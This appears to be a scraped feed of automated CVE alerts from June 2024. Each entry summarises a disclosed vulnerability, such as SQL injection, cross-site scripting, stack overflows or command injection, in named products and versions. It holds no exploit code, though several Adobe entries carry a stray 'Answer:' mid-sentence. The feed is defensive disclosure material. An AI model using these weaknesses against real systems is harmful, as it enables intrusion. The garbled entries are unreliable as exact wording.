🚨 CVE-2024-6082A vulnerability, which was classified as problematic, has been found in PHPVibe 11.0.46. This issue affects some unknown processing of the file functionalities.global.php of the component Global Options Page. The manipulation of the argument site-logo-text leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268823. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-17 23:37:24 |
🚨 CVE-2024-6080A vulnerability classified as critical was found in Intelbras InControl 2.21.56. This vulnerability affects unknown code. The manipulation leads to unquoted search path. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-268822 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-17 22:37:25 |
🚨 CVE-2024-6067A vulnerability classified as critical was found in SourceCodester Music Class Enrollment System 1.0. Affected by this vulnerability is an unknown functionality of the file /mces/?p=class/view_class. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268795.🎖@cveNotify |
|
| 2024-06-17 22:37:24 |
🚨 CVE-2020-10136IP-in-IP protocol specifies IP Encapsulation within IP standard (RFC 2003, STD 1) that decapsulate and route IP-in-IP traffic is vulnerable to spoofing, access-control bypass and other unexpected behavior due to the lack of validation to verify network packets before decapsulation and routing.🎖@cveNotify |
|
| 2024-06-17 21:37:35 |
🚨 CVE-2024-6066A vulnerability classified as critical has been found in SourceCodester Best House Rental Management System 1.0. Affected is an unknown function of the file payment_report.php. The manipulation of the argument month_of leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268794 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-17 21:37:31 |
🚨 CVE-2024-6064A vulnerability was found in GPAC 2.5-DEV-rev228-g11067ea92-master. It has been declared as problematic. This vulnerability affects the function xmt_node_end of the file src/scene_manager/loader_xmt.c of the component MP4Box. The manipulation leads to use after free. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The name of the patch is f4b3e4d2f91bc1749e7a924a8ab171af03a355a8/c1b9c794bad8f262c56f3cf690567980d96662f5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-268792.🎖@cveNotify |
|
| 2024-06-17 21:37:30 |
🚨 CVE-2024-37828A stored cross-site scripting (XSS) in Vermeg Agile Reporter v23.2.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Message field under the Set Broadcast Message module.🎖@cveNotify |
|
| 2024-06-17 21:37:29 |
🚨 CVE-2024-37798Cross-site scripting (XSS) vulnerability in search-appointment.php in the Admin Panel in Phpgurukul Beauty Parlour Management System 1.0 allows remote attackers to inject arbitrary web script or HTML via the search input field.🎖@cveNotify |
|
| 2024-06-17 21:37:26 |
🚨 CVE-2024-34833Sourcecodester Payroll Management System v1.0 is vulnerable to File Upload. Users can upload images via the "save_settings" page. An unauthenticated attacker can leverage this functionality to upload a malicious PHP file instead. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as the user running the web server.🎖@cveNotify |
|
| 2024-06-17 21:37:25 |
🚨 CVE-2024-36821Insecure permissions in Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617 allows attackers to escalate privileges from Guest to root.🎖@cveNotify |
|
| 2024-06-17 21:37:24 |
🚨 CVE-2024-36837SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.🎖@cveNotify |
|
| 2024-06-17 20:37:37 |
🚨 CVE-2024-36227Adobe Experience Manager versions 6.5.20 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a user to click on a specially crafted link or to submit a malicious form.🎖@cveNotify |
|
| 2024-06-17 20:37:31 |
🚨 CVE-2024-36164Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 20:37:30 |
🚨 CVE-2024-36151Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue requires user interaction, as the victim needs to visit a web page with a maliciously crafted script.🎖@cveNotify |
|
| 2024-06-17 20:37:29 |
🚨 CVE-2024-26117Adobe Experience Manager versions 6.5.20 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2024-06-17 20:37:26 |
🚨 CVE-2024-26091Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a victim to click on a specially crafted link or to submit a form that causes the vulnerable script to execute.🎖@cveNotify |
|
| 2024-06-17 20:37:25 |
🚨 CVE-2024-26086Adobe Experience Manager versions 6.5.20 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2024-06-17 20:37:24 |
🚨 CVE-2024-25400Subrion CMS 4.2.1 is vulnerable to SQL Injection via ia.core.mysqli.php. NOTE: this is disputed by multiple third parties because it refers to an HTTP request to a PHP file that only contains a class, without any mechanism for accepting external input, and the reportedly vulnerable method is not present in the file.🎖@cveNotify |
|
| 2024-06-17 20:07:41 |
🚨 CVE-2024-36232Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 20:07:37 |
🚨 CVE-2024-36225Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 20:07:36 |
🚨 CVE-2024-36222Adobe Experience Manager versions 6.5.20 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a victim to click on a specially crafted link or to submit a form that triggers the vulnerability.🎖@cveNotify |
|
| 2024-06-17 20:07:35 |
🚨 CVE-2024-36221Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 20:07:32 |
🚨 CVE-2024-36220Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue requires user interaction, such as convincing a victim to click on a specially crafted link or to submit a form that triggers the malicious script.🎖@cveNotify |
|
| 2024-06-17 20:07:31 |
🚨 CVE-2024-36190Adobe Experience Manager versions 6.5.20 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a user to click on a specially crafted link or to submit a form that triggers the vulnerability.🎖@cveNotify |
|
| 2024-06-17 20:07:30 |
🚨 CVE-2024-36184Adobe Experience Manager versions 6.5.20 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a user to click on a malicious link or to submit a specially crafted form.🎖@cveNotify |
|
| 2024-06-17 20:07:27 |
🚨 CVE-2024-36183Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a user to click on a specially crafted link or to submit a malicious form.🎖@cveNotify |
|
| 2024-06-17 20:07:26 |
🚨 CVE-2024-36181Adobe Experience Manager versions 6.5.20 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue requires user interaction, typically in the form of convincing a victim to visit a maliciously crafted web page or to interact with a maliciously modified DOM element within the application.🎖@cveNotify |
|
| 2024-06-17 20:07:25 |
🚨 CVE-2024-36166Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 20:07:24 |
🚨 CVE-2024-36165Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:37:42 |
🚨 CVE-2024-36217Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:37:41 |
🚨 CVE-2024-36214Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:07:36 |
🚨 CVE-2024-36202Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:07:32 |
🚨 CVE-2024-36200Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:07:31 |
🚨 CVE-2024-36198Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:07:30 |
🚨 CVE-2024-36196Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:07:26 |
🚨 CVE-2024-36193Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:07:25 |
🚨 CVE-2024-36192Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 19:07:24 |
🚨 CVE-2024-36191Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 18:37:26 |
🚨 CVE-2024-4032The “ipaddress” module contained incorrect information about whether certain IPv4 and IPv6 addresses were designated as “globally reachable” or “private”. This affected the is_private and is_global properties of the ipaddress.IPv4Address, ipaddress.IPv4Network, ipaddress.IPv6Address, and ipaddress.IPv6Network classes, where values wouldn’t be returned in accordance with the latest information from the IANA Special-Purpose Address Registries.CPython 3.12.4 and 3.13.0a6 contain updated information from these registries and thus have the intended behavior.🎖@cveNotify |
|
| 2024-06-17 18:37:25 |
🚨 CVE-2024-33377LB-LINK BL-W1210M v2.0 was discovered to contain a clickjacking vulnerability via the Administrator login page. Attackers can cause victim users to perform arbitrary operations via interaction with crafted elements on the web page.🎖@cveNotify |
|
| 2024-06-17 18:37:24 |
🚨 CVE-2024-33374Incorrect access control in the UART/Serial interface on the LB-LINK BL-W1210M v2.0 router allows attackers to access the root terminal without authentication.🎖@cveNotify |
|
| 2024-06-17 18:07:25 |
🚨 CVE-2024-36186Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 18:07:24 |
🚨 CVE-2024-36185Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 17:07:29 |
🚨 CVE-2024-36174Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 17:07:26 |
🚨 CVE-2024-36173Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 17:07:25 |
🚨 CVE-2024-36170Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 17:07:24 |
🚨 CVE-2024-36169Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 16:37:37 |
🚨 CVE-2024-36575A Prototype Pollution issue in getsetprop 1.1.0 allows an attacker to execute arbitrary code via global.accessor.🎖@cveNotify |
|
| 2024-06-17 16:37:36 |
🚨 CVE-2024-36573almela obx before v.0.0.4 has a Prototype Pollution issue which allows arbitrary code execution via the obx/build/index.js:656), reduce (@almela/obx/build/index.js:470), Object.set (obx/build/index.js:269) component.🎖@cveNotify |
|
| 2024-06-17 16:37:35 |
🚨 CVE-2024-0397A defect was discovered in the Python “ssl” module where there is a memoryrace condition with the ssl.SSLContext methods “cert_store_stats()” and“get_ca_certs()”. The race condition can be triggered if the methods arecalled at the same time as certificates are loaded into the SSLContext,such as during the TLS handshake with a certificate directory configured.This issue is fixed in CPython 3.10.14, 3.11.9, 3.12.3, and 3.13.0a5.🎖@cveNotify |
|
| 2024-06-17 16:37:31 |
🚨 CVE-2024-6008A vulnerability, which was classified as critical, was found in itsourcecode Online Book Store up to 1.0. Affected is an unknown function of the file /edit_book.php. The manipulation of the argument image leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268698 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-17 16:37:30 |
🚨 CVE-2024-36180Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 16:37:26 |
🚨 CVE-2024-36178Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 16:37:25 |
🚨 CVE-2024-36176Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 16:37:24 |
🚨 CVE-2024-36175Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-17 14:37:43 |
🚨 CVE-2024-6047Certain EOL GeoVision devices fail to properly filter user input for the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device.🎖@cveNotify |
|
| 2024-06-17 14:37:39 |
🚨 CVE-2024-6041A vulnerability was found in itsourcecode Gym Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268765 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-17 14:37:38 |
🚨 CVE-2024-34997joblib v1.4.2 was discovered to contain a deserialization vulnerability via the component joblib.numpy_pickle::NumpyArrayWrapper().read_array(). NOTE: this is disputed by the supplier because NumpyArrayWrapper is only used during caching of trusted content.🎖@cveNotify |
|
| 2024-06-17 13:37:41 |
🚨 CVE-2024-6057Improper authentication in the vault password feature in Devolutions Remote Desktop Manager 2024.1.31.0 and earlier allows an attacker that has compromised an access to an RDM instance to bypass the vault master password via the offline mode feature.🎖@cveNotify |
|
| 2024-06-17 13:37:40 |
🚨 CVE-2024-5629An out-of-bounds read in the 'bson' module of PyMongo 4.6.2 or earlier allows deserialization of malformed BSON provided by a Server to raise an exception which may contain arbitrary application memory.🎖@cveNotify |
|
| 2024-06-17 13:37:36 |
🚨 CVE-2023-33106Memory corruption while submitting a large list of sync points in an AUX command to the IOCTL_KGSL_GPU_AUX_COMMAND.🎖@cveNotify |
|
| 2024-06-17 13:37:35 |
🚨 CVE-2023-33063Memory corruption in DSP Services during a remote call from HLOS to DSP.🎖@cveNotify |
|
| 2024-06-17 13:37:34 |
🚨 CVE-2023-22518All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.🎖@cveNotify |
|
| 2024-06-17 13:37:30 |
🚨 CVE-2023-20273A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges.🎖@cveNotify |
|
| 2024-06-17 13:37:29 |
🚨 CVE-2023-20198Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.🎖@cveNotify |
|
| 2024-06-17 13:37:28 |
🚨 CVE-2023-20109A vulnerability in the Cisco Group Encrypted Transport VPN (GET VPN) feature of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker who has administrative control of either a group member or a key server to execute arbitrary code on an affected device or cause the device to crash. This vulnerability is due to insufficient validation of attributes in the Group Domain of Interpretation (GDOI) and G-IKEv2 protocols of the GET VPN feature. An attacker could exploit this vulnerability by either compromising an installed key server or modifying the configuration of a group member to point to a key server that is controlled by the attacker. A successful exploit could allow the attacker to execute arbitrary code and gain full control of the affected system or cause the affected system to reload, resulting in a denial of service (DoS) condition. For more information, see the Details ["#details"] section of this advisory.🎖@cveNotify |
|
| 2024-06-17 13:37:27 |
🚨 CVE-2023-1671A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.🎖@cveNotify |
|
| 2024-06-17 13:08:03 |
🚨 CVE-2024-30058Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-06-17 13:07:59 |
🚨 CVE-2024-37635TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via ssid in the function setWiFiBasicCfg🎖@cveNotify |
|
| 2024-06-17 13:07:58 |
🚨 CVE-2024-37633TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via ssid in the function setWiFiGuestCfg🎖@cveNotify |
|
| 2024-06-17 13:07:57 |
🚨 CVE-2024-37632TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via the password parameter in function loginAuth .🎖@cveNotify |
|
| 2024-06-17 13:07:54 |
🚨 CVE-2024-37631TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via the File parameter in function UploadCustomModule.🎖@cveNotify |
|
| 2024-06-17 13:07:53 |
🚨 CVE-2024-36588An issue in Annonshop.app DecentralizeJustice/ anonymousLocker commit 2b2b4 allows attackers to send messages erroneously attributed to arbitrary users via a crafted HTTP request.🎖@cveNotify |
|
| 2024-06-17 13:07:52 |
🚨 CVE-2024-36586An issue in AdGuardHome v0.93 to latest allows unprivileged attackers to escalate privileges via overwriting the AdGuardHome binary.🎖@cveNotify |
|
| 2024-06-17 12:37:40 |
🚨 CVE-2024-5742A vulnerability was found in GNU Nano that allows a possible privilege escalation through an insecure temporary file. If Nano is killed while editing, a file it saves to an emergency file with the permissions of the running user provides a window of opportunity for attackers to escalate privileges through a malicious symlink.🎖@cveNotify |
|
| 2024-06-17 09:37:47 |
🚨 CVE-2024-6042A vulnerability was found in itsourcecode Real Estate Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file property-detail.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268766 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-17 08:37:41 |
🚨 CVE-2024-36289Reusing a nonce, key pair in encryption issue exists in "FreeFrom - the nostr client" App versions prior to 1.3.5 for Android and iOS. If this vulnerability is exploited, the content of direct messages (DMs) between users may be manipulated by a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-06-17 08:37:40 |
🚨 CVE-2024-36277Improper verification of cryptographic signature issue exists in "FreeFrom - the nostr client" App versions prior to 1.3.5 for Android and iOS. The affected app cannot detect event data with invalid signatures.🎖@cveNotify |
|
| 2024-06-17 07:37:24 |
🚨 CVE-2024-5650DLL Hijacking vulnerability has been found in CENTUM CAMS Log server provided by Yokogawa Electric Corporation. If an attacker is somehow able to intrude into a computer that installed affected product or access to a shared folder, by replacing the DLL file with a tampered one, it is possible to execute arbitrary programs with the authority of the SYSTEM account.The affected products and versions are as follows:CENTUM CS 3000 R3.08.10 to R3.09.50CENTUM VP R4.01.00 to R4.03.00, R5.01.00 to R5.04.20, R6.01.00 to R6.11.10.🎖@cveNotify |
|
| 2024-06-17 06:37:32 |
🚨 CVE-2024-6047Certain EOL GeoVision devices fail to properly filter user input for the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device.🎖@cveNotify |
|
| 2024-06-17 06:37:31 |
🚨 CVE-2024-3236The Popup Builder WordPress plugin before 1.1.33 does not sanitise and escape some of its Notification fields, which could allow users such as contributor and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-06-17 04:37:25 |
🚨 CVE-2024-6046SECOM WRTR-304GN-304TW-UPSC V02(unsupported-when-assigned) does not properly filter user input in the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device.🎖@cveNotify |
|
| 2024-06-17 04:37:24 |
🚨 CVE-2024-6045Certain models of D-Link wireless routers contain an undisclosed factory testing backdoor. Unauthenticated attackers on the local area network can force the device to enable Telnet service by accessing a specific URL and can log in by using the administrator credentials obtained from analyzing the firmware.🎖@cveNotify |
|
| 2024-06-17 03:37:48 |
🚨 CVE-2024-5163Improper permission settings for mobile applications (com.transsion.carlcare) may lead to user password and account security risks.🎖@cveNotify |
|
| 2024-06-17 01:37:24 |
🚨 CVE-2024-6043A vulnerability classified as critical has been found in SourceCodester Best House Rental Management System 1.0. This affects the function login of the file admin_class.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268767.🎖@cveNotify |
|
| 2024-06-17 00:37:44 |
🚨 CVE-2024-6042A vulnerability was found in itsourcecode Real Estate Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file property-detail.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268766 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-16 23:37:24 |
🚨 CVE-2024-6041A vulnerability was found in itsourcecode Gym Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268765 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-16 22:37:25 |
🚨 CVE-2024-6039A vulnerability, which was classified as critical, was found in Feng Office 3.11.1.2. Affected is an unknown function of the component Workspaces. The manipulation of the argument dim leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268752.🎖@cveNotify |
|
| 2024-06-16 22:37:24 |
🚨 CVE-2024-34451Ghost through 5.85.1 allows remote attackers to bypass an authentication rate-limit protection mechanism by using many X-Forwarded-For headers with different values. NOTE: the vendor's position is that Ghost should be installed with a reverse proxy that allows only trusted X-Forwarded-For headers.🎖@cveNotify |
|
| 2024-06-16 21:37:25 |
🚨 CVE-2023-27636Progress Sitefinity before 15.0.0 allows XSS by authenticated users via the content form in the SF Editor.🎖@cveNotify |
|
| 2024-06-16 21:37:24 |
🚨 CVE-2024-5197There exists interger overflows in libvpx in versions prior to 1.14.1. Calling vpx_img_alloc() with a large value of the d_w, d_h, or align parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned vpx_image_t struct may be invalid. Calling vpx_img_wrap() with a large value of the d_w, d_h, or stride_align parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned vpx_image_t struct may be invalid. We recommend upgrading to version 1.14.1 or beyond🎖@cveNotify |
|
| 2024-06-16 16:37:30 |
🚨 CVE-2024-38467Shenzhen Guoxin Synthesis image system before 8.3.0 allows unauthorized user information retrieval via the queryUser API.🎖@cveNotify |
|
| 2024-06-16 16:37:26 |
🚨 CVE-2024-38465Shenzhen Guoxin Synthesis image system before 8.3.0 allows username enumeration because of the response discrepancy of incorrect versus error.🎖@cveNotify |
|
| 2024-06-16 16:37:25 |
🚨 CVE-2024-38461irodsServerMonPerf in iRODS before 4.3.2 attempts to proceed with use of a path even if it is not a directory.🎖@cveNotify |
|
| 2024-06-16 16:37:24 |
🚨 CVE-2024-3049A flaw was found in Booth, a cluster ticket manager. If a specially-crafted hash is passed to gcry_md_get_algo_dlen(), it may allow an invalid HMAC to be accepted by the Booth server.🎖@cveNotify |
|
| 2024-06-16 15:37:26 |
🚨 CVE-2024-38460In SonarQube before 10.4 and 9.9.4 LTA, encrypted values generated using the Settings Encryption feature are potentially exposed in cleartext as part of the URL parameters in the logs (such as SonarQube Access Logs, Proxy Logs, etc).🎖@cveNotify |
|
| 2024-06-16 15:37:25 |
🚨 CVE-2024-38457Xenforo before 2.2.16 allows CSRF.🎖@cveNotify |
|
| 2024-06-16 15:37:24 |
🚨 CVE-2024-38454ExpressionEngine before 7.4.11 allows XSS.🎖@cveNotify |
|
| 2024-06-16 14:37:25 |
🚨 CVE-2024-38448htags in GNU Global through 6.6.12 allows code execution in situations where dbpath (aka -d) is untrusted, because shell metacharacters may be used.🎖@cveNotify |
|
